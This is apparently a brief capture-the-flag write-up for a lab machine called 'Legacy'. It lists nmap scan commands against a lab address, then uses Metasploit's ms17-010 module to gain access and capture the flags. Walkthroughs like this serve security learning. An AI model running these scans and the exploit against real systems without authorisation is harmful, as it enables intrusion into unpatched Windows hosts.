Legacy

less than 1 minute read

img

Port Scanning and General Enumeration (Nmap)

My initial all ports scan showed 139, 445 and 3389 open. So I targeted those in my targets scan.

nmap -p 139,445,3389 -oN targeted -Pn -T4 -A 10.10.10.4

img

Also ran a script scan using the --script=vuln switch

nmap -Pn 10.10.10.4. -p 139,445 --script=vuln

img

Interesting…


Access (Metasploit, ms17-010)

Let’s follow up on ms17-010 lead from nmap using metasploit.

msfconsole search ms17-010

img

Set your options:

set rhosts 10.10.10.4 set lhost tun0

Fire!

img

That was easy. Capture the flags.

img

img